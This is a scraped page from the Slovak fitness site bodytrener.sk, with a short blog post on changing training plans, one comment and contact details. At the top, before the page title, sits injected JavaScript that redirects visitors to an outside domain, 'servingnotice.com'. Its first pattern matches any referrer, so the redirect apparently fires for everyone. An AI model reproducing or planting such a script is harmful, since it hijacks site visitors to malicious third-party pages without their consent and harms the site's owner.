var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/O7ul2v/intermediary.html?richubaidaninfo"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; Ako meniť tréningy, tréningové plány, tréningový plán | www.bodytrener.sk
Blog
...naučte sa niečo nové!

Ako meniť tréningy

Pri pravidelnom cvičení rovnakých cvikov dochádza k stagnácii vašich výsledkov. Aby ste stagnácii predišli, potrebujete meniť Vaše tréningové plány. Meniť by ste mali počet opakovaní, sérii a cviky. Tréningy treba meniť v pravidelných intervaloch.

Necvičte neustále len objemové tréningy. Tréningové zamerania meňte aby Vaše svaly získali nový impulz pre cvičenie.

Tréningové plány si vyberajte podľa vašich možností a skúseností. Zbytočne sa nepreceňujte lebo si môžete privodiť zranenie ako je natrhnutie svalu alebo niečo vytknúť.

My sme odborníci, ktorí Vám ponúkajú naše služby. Vytvoríme Vám tréning, jedálniček a poradíme ohľadom cvičenia. Tréning zvolíme presne na vašu osobu. Pozrite naše služby!

Diskusia (1)

    • Vilko
    • 26. Jún 2012 o 6:31

    Ja si dávam pred a po cvičení tréning, zatiaľ som žiadne zranenie nemal.

    Odpovedať

Pridať komentár




Odber noviniek

Pridajte sa k odberu noviniek a získajte najnovšie informácie o článkoch, zľavách a súťažiach.

Potrebujete pomoc?

Adresa:
Bodytrener.sk
Pažite 5
010 09 Žilina

Pracovná doba:
Pondelok – Piatok
10:00 – 18:00

E-mail: info@bodytrener.sk
Telefón: +421 904 569 865

Bankové účty:
2200359578/8330 - SLOVENSKO
2900359579/2010 - ČESKO

© 2013 Bodytrener.sk. Všetky práva vyhradené.

Pridaj si nás na Facebooku